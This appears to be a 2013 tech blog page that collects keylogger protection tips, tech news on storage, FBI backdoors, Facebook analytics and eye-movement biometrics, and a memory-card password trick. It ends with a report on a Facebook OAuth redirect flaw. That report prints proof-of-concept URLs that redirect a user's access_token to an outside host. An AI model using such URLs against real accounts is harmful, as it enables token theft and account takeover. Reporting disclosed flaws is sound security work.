Wednesday, May 8, 2013

How to secure your system from Keyloggers_ by SHINE SREEDHAR



What is Keylogger?


Keylogger is one of spyware which will what type you through the keyboard and send it to hacker who send the keylogger. Hackers mainly use keyloggers to steal your passwords, credit card numbers and other confidential data.  So whenever you type the username and password in gmail,online banking sites, it will send the username and password to hacker.  







How to Protect?


In order to provide security for your system,you must have


Good AntiVirus:
This is basic and best step to protect your system from keylogger.  So buy a licensed and best antivirus which is currently in market.  My suggestion is Kaspersky, Norton or Mcafee.  Don't forget to update regularly.
Note: Don't use trial or cracked pack ,it is worthless to use.

Good Spyware:
Since keyloggers are basically spywares, if you are a frequent user of Internet then you could be exposed to thousands of keyloggers and spywares. So you should use a good antispyware such as NoAdware.




Antilogger can be Handy

Antiloggers are programs that detect the presence of keyloggers on a given computer. Zemana Antilogger is the best antilogger.

Online Scanning

When ever you receive a suspicious file, you scan it with online scanners such as Multi engine antivirus scanner which scans your file with 24 antivirus engines and reports it back to you if the file is recognized as a virus or spyware. This ensures that none of the malicious programs can escape from being detected as there are 24 different antivirus engines are involved in the scanning process.

Keyscrambler

Keyscrambler is one of the best protection against keyloggers that you can have, Keyscrambler is a small program which encrypts your typed keystrokes so even if the victim has installed a keylogger on your system, he or she will get encrypted keys. Keyscrambler currently supports Firefox, Internet explorer and other applications, however its premium version supports more than 160 applications

World’s Smallest Magnetic Data Storage



Smallest Data Storage Device
Smallest Data Storage Device
There will be a time when all the major technologies in the world will be in nanoscale. Recent developments have been undergone in daily used electronic gadgets like mobiles, computers, laptops and so on. As a part of this, a group of researchers from IBM and CFEL (Centre for free-electron Laser Science) have been successful in developing the world’s smallest magnetic data storage unit. The newly invented unit needs only 12 atoms for storing one bit. That is, 96 atoms for storing one byte. In a conventional memory storage unit a byte consists of half a billion atoms and hence this new technology will prove to be a breakthrough for producing the new generation of devices called “nanogadgets”.
This nano data storage unit was made by placing atom by atom by using a STM (scanning tunneling microscope) at IBM’s Almaden research centre in San Jose, California. First a regular pattern of iron atoms were constructed and then they were aligned in such a way that each row contains six atoms. The storage density of this nano structured memory unit is supposed to be a hundred times better than the currently used hard drives.
With the help of an STM data is written to the nano storage unit. The pairs of the atoms will be having two magnetic states representing zero and one. By using the STM the polarity of the atoms are changed to the desired value. For this purpose, an electromagnetic pulse is applied to the electrons from the STM. A weaker electronic pulse is used to read the data from the nano structure.
 In conventional hard drives and other data storage structures data is stored by ferromagnetism but here special form of magnetism called the anti ferromagnetism is used here to record data. As the materials are anti ferromagnetic, the atoms can be spaced more closely as the magnetic fields will not be interfering with each other and hence nano size can be achieved. Scientists say that this discovery will open new doors to quantum physics and smarter gadgets can be developed in the near future.

FBI surveillance backdoor might be open to hackers



This past May, according to news reports, the FBI lobbied the White House not to oppose a new piece of legislation the FBI's lawyers had drafted.
The proposed law would force companies such as Facebook, Google, Microsoft and Twitter to build "backdoors" into their software so that law-enforcement agencies could eavesdrop on communications.
But privacy advocates say building backdoors into communications software and hardware may create more problems than it solves for law enforcement — and may make the country more vulnerable to cyber attacks.
Hand over the keys
The FBI would neither confirm nor deny the existence of the legislation or its White House visit, but it's something the bureau has nonetheless been asking Congress for.

"It is critically important that we have the ability to intercept electronic communications with court approval," FBI General Counsel Valerie Caproni told a House subcommittee in February 2011. "We confront, with increasing frequency, service providers who do not fully comply with court orders in a timely and efficient manner."
Caproni cited the cases of a South American arms-trafficking ring that used encrypted communications and a pimp who lured underage girls into his prostitution ring through social networking.
The prosecution of both cases, she said, was hampered by the inability of law enforcement to eavesdrop on the suspects.
More recently, Twitter has resisted the New York City Police Department's demands that it turn over records pertaining to its users. Such headaches would be forgotten if the FBI's proposed law were to be passed. 
In December, FBI Director Robert Mueller testified to Congress that there was a real risk of law enforcement "going dark" — losing the ability to intercept communications.
"A growing gap exists between the statutory authority of law enforcement to intercept electronic communications pursuant to court order and our practical ability to intercept those communications," Mueller said.
In other words, the technology now available to criminals, terrorists and ordinary citizens is outstripping the ability of the FBI and other law-enforcement organizations to listen in.
The law as it now stands
The proposed legislation would amend a 1994 law called the Communications Assistance for Law Enforcement Act (CALEA).

CALEA is the reason the phone company can allow police to tap calls at the switching substation, where the calls are routed, rather than have someone install a bug in a house. The law was expanded in 2004 to include broadband Internet providers.
Ever since the Pretty Good Privacy encryption program for email was introduced in the early 1990s, encryption has been widely available to the general public. Encryption used to take up a lot of computing power, but the processing speed of current devices makes it easy.




The Internet-based international telephone-and-video-chat service Skype also encrypts calls, though there are ways to defeat it. Many privacy advocates worry that Microsoft's recent acquisition of Skype means that the government will soon have keys to decrypt its communications.Research In Motion's Blackberry Messenger service, for example, is so strongly encrypted that the governments of India and the United Arab Emirates have demanded the company provide the keys to decoding the messages. (RIM has partially complied.)

Even so, the FBI says there are still obstacles.
"Many communications providers are not required to build or maintain intercept capabilities in their ever-changing networks," Mueller told theHouse and Senate Judiciary Committees in May. "As a result, they are too often not equipped to respond to information sought pursuant to a lawful court order. … We must ensure that the laws by which we operate keep pace with new threats and new technology."
Basically, that means the phone companies and device makers aren't forced to build in eavesdropping ability for law enforcement.
If the FBI gets in, can hackers too?
Right now the law applies to telecom providers — phone companies — but the FBI is seeking to expand the definition. (It's important to note that nobody is looking to change the law that a search warrant be required towiretap anyone.)

That may speed up gathering evidence. But it can also leave the good guys vulnerable, said Chris Calabrese, legislative counsel at the American Civil Liberties Union in Washington, D.C.
"In Greece, the prime minister's phone calls were being tapped," Calabrese said, referring to a 2005 incident in which high-level Greek government officials found their phones had been hacked.
While it was likely that a rival intelligence agency had done it, the access to the systems was given by the same sort of "backdoor" as the FBI is seeking.
Calabrese added that it's debatable as to whether law enforcement really needs additional surveillance capabilities.
Other methods already exist — for example, encrypted communications can be tapped if an FBI agent or police officer gets access to a suspect's computer, and a keylogger would reveal all of the suspect's passwords quickly.
It's also possible to eavesdrop on communications at the "switch" level by asking a telecom provider for access.
"They can get a lot of this via AT&T," Calabrese said. "Is it really worth re-architecting the Internet?"
(Last month, nine U.S. cellular carriers revealed that they had received more than 1 million law-enforcement requests for customer data in 2011.)
Peter Eckersley, technology projects director at the Electronic Frontier Foundation, a digital-rights advocacy group in San Francisco, said the problem is that when you build any vulnerability into a system, security decreases significantly.


Stewart Baker, a former assistant secretary of policy at the Department of Homeland Security, disagreed with Calabrese and Eckersley.In other words, a built-in backdoor won't stay a secret for long, and a good hacker will learn to exploit it.

"I would not judge all lawful intercept features based on the Greek experience any more than I’d judge government management of the economy based on the Greek experience," Baker told SecurityNewsDaily in an email.
Traditional methods of surveillance are more "hit or miss," Baker said. "Keyloggers aren't as easy as you imagine."
As for the vulnerabilities introduced by backdoors, Baker said that careful monitoring can prevent them from being used by criminals or abused by law enforcement.
The power may already be there
Michael Gregg, president and chief operating officer of Superior Solutions, an IT security consulting firm in Houston, has done penetration testing and training for federal agencies, including law enforcement.

"The federal government presently has a wide array of tools that can be used to monitor voice communications, cellphones and electronic data on the Internet," Gregg said. "While built-in backdoors would make it much easier for the government to monitor communications in real time, the real question is: Would such technology be abused and used to limit free speech?"
Gregg's concerns become especially salient with the prospect of backdoors being built directly into websites. An oppressive government might use it to monitor visitors to the site.
Some new technologies actually make it easier for the FBI, or anyone else, to track where one goes online. Internet Protocol version 6, the upcoming universal Internet standard, makes it possible to link an Internet address to a machine's unique network hardware.
"Advertisers, criminals, they would all be able to see it," Eckersley said.
Some operating systems — Windows 7 and Apple's OS X and iOS among them — add  privacy features to IPv6 that generate random Internet addresses. But Eckersley noted that the implementation is not universal.
To him, that fact makes the FBI's claim that it needs new backdoors all the more surprising.

Dive deep into your Facebook data with new search tool



Wolfram Alpha, the "computational knowledge engine" that instantly performs complex analysis on data and queries, has introduced a new tool that gives an amazingly thorough look at your Facebook usage and friends — from what hour and weekday you post the most links, to the marital status of everyone you know over the years.
Millions of people post millions of things to Facebook every day, but after a week or so most links, statuses and comments are filed away, usually never to be seen again. Wolfram Alpha will dig through all this information, and whatever your friends have made visible to you, and produce a bewildering spread of data relating to your Facebook usage.
Wolfram
Wolfram|Alpha
Friend networks visualized in different ways.
Some of it is fun but straightforward: what apps you use the most, how many of your friends are named "Chris," and so on. But it also surfaces some very interesting and well-presented data, like a visual map of your friend connections and a representation showing your usage patterns over the week. Are you in the habit of dumping your photos for the week into an album on Sunday night, or making rambling status updates after a night out with friends? You'll see that clearly.
All this information would likely be very valuable to companies and brands that rely on Facebook for social promotion, but right now the service is limited to personal accounts. A version for Facebook Pages may also be in the works.
To access the service, simply go to Wolfram Alpha and put "Facebook report" into the field (or just follow the link); it will ask you to create an account at the site and to give it permission to pull data from your posts and friends list. The app does access a ton of your private data, but it's kept private unless you specifically share a part of it, and after an hour it's deleted from the system.
More information on the service can be found at a blog post by the site's founder, Stephen Wolfram; he says that based on how people use the service, new features will be added. And of course the report will change in some ways as your habits and friends evolve, so it's worth doing again in a month or two anyway.

Eye movements could be next PC password



No two people look at the world in the same way — literally. When looking at a picture, different people will move their eyes among points of interest in different sequences, researchers have found. Even if two people trace the same paths, the exact way they move their eyes differs. That's why Oleg Komogortsev, a computer scientist at Texas State University-San Marcos, is looking to create a system that can identify people by the way they flicker their eyes while looking at a computer screen.
"We are seeing there are enough differences so we can talk about this as a biometric," Komogortsev told TechNewsDaily. A biometric is a measurement of something on the body — fingerprints, for instance — used to identify people. Computer scientists all over the world are studying biometrics for crime solving, for border security, and just as a high-tech way to sign into smartphones, tablets and other devices.
Komogortsev's research is in its earliest stages and needs years of work before it might show up at airports, high-security workplaces or even home computers. However, he thinks eye movements could be part of the next generation of a more established biometric, iris scans, which are already used in some airports and private companies, and in a countrywide ID effort in India
Previously, researchers showed that crooks can fool an iris scanner with printed contacts, or by holding up a high-quality printout of the correct person's eye in front of the scanner. Komogortsev hopes adding an eye-movement sensor could prevent this type of counterfeiting. "The strength of our method is it can work together with iris [scanning]," he said.
"They appear to be making progress in refining and perfecting the idea," Kevin Bowyer, an iris-scanning researcher at the University of Notre Dame, wrote to TechNewsDaily in an email. Bowyer reviewed papers for a recent conference in which Komogortsev presented his research, but was not involved in Komogortsev's work. 
If the Texas State University research goes well, Komogortsev's team could field test an eye-movement security machine in "the next year or two or three," Bowyer said.
Komogortsev's system records eye movements and analyzes two features. In one, the system measures "fixations," the times when people linger their gaze over a point on screen. In another, it measures "saccades," the swift movements the eye makes when it flies between points. Komogortsev’s system considers both the exact path that people's gazes take and the fixations and saccades they make along the way. [SEE ALSO: Eye Movements Control New Laptop Computer]
From those movements, the system calculates unique properties about people's eyes, including the force their eye muscles use and other properties about the fat and flesh around the eye and the eyeball itself, Komogortsev explained.
In research they recently presented, Komogortsev and his team recorded people's eyes as the subjects read part of a poem ("The Hunting of the Snark" by Lewis Carroll), looked at Rorschach inkblots and watched a black screen on which white dots suddenly appeared. All three images worked well. "If you collect enough eye-movement information, no matter the type of stimulus, it's pretty reliable," Komogortsev said.
Eye movements alone have an "equal error rate" of about 34 percent, he and his colleagues found. The equal error rate is a standard measure in security research that takes into account both false positives, letting someone through who doesn't belong, and false negatives, locking someone out who does belong. Smaller rates mean the system works more effectively, and rates for market-ready technologies are generally in the single digits.
The equal error rate of eye movements combined with low-cost iris scans is much better, at about 5 percent, Komogortsev found. The low-cost iris scans alone have an equal error rate of about 6 percent.

Thursday, May 2, 2013

HOW TO UNLOCK A LOCKED MEMORY CARD..!!!


There is an efficient method to unlock a locked memory card. For that u must follow these steps  
.
Insert card to your phone.

Download software named as "FExplorer" to your phone.

Open the application and find the file "mmcstore

Rename mmcstore to mmcstore.txt 

Copy this text file to your PC and open it with notepad.

Now you can see your lost / unknown password in that file.


 
Thanks for reading :: SHINE SREEDHAR

Thursday, April 25, 2013

URL REDIRECTION FLAW IN FACEBOOK APPS PUSH OAUTH VULNERABILITY BACK IN ACTION



In earlier posts, our Facebook hacker 'Nir Goldshlager' exposed two serious Facebook oAuth Flaws. One, Hacking a Facebook account even without the user installing an application on their account and second, various ways to bypassing the regex protection in Facebook OAuth.

This time, Nir illustrated a scenario attack "what happens when a application is installed on the victim’s account and how an attacker can manipulate it so easily" According to hacker, if the victim has an installed application like Skype or Dropbox, still hacker is able to take control over their accounts.


For this, an attacker required only a url redirection or cross site scripting vulnerability on the Facebook owner app domain i.e in this scenario we are talking about skype facebook app. In many bug bounty programs URL redirection is not considered as an valid vulnerability for reward i.e Google Bug bounty Program.

Nir also demonstrated that an attacker is even able to gain knowledge of which application theirvictims are using. Example url : https://www.facebook.com/ajax/browser/dialog/friends_using_app/?app_id=260273468396&__asyncDialog=2&__a=1&__req=m
















Because Facebook applications are developed by 3rd Party developers, who actually own the app, so facebook was helpless when to fix such potentially pernicious site redirection attacks.

Continuing hacking method used in last two oAuth flaws (mentioned here), this time attack is trying to use app redirection flaw in “redirect_uri, next” parameter to steal the access_token of facebook users.

POC (Using Skype app) : https://www.facebook.com/dialog/permissions.request?app_id=260273468396&display=page&next=http://metrics.skype.com/b/ss/skypeglobalmobile/5.4/REDIR/?url=http://files.nirgoldshlager.com&response_type=token&fbconnect=1

POC (Using Dropbox app) : https://www.facebook.com/dialog/permissions.request?app_id=210019893730&display=page&next=https://www.dropbox.com/u/68182951/redirect3.html&response_type=token&perms=email&fbconnect=1

The purpose of the hacker is just to steal the victim’s access_token through the use of Facebook OAuth flaws, so that he can take full control over victim's account remotely without knowing their passwords.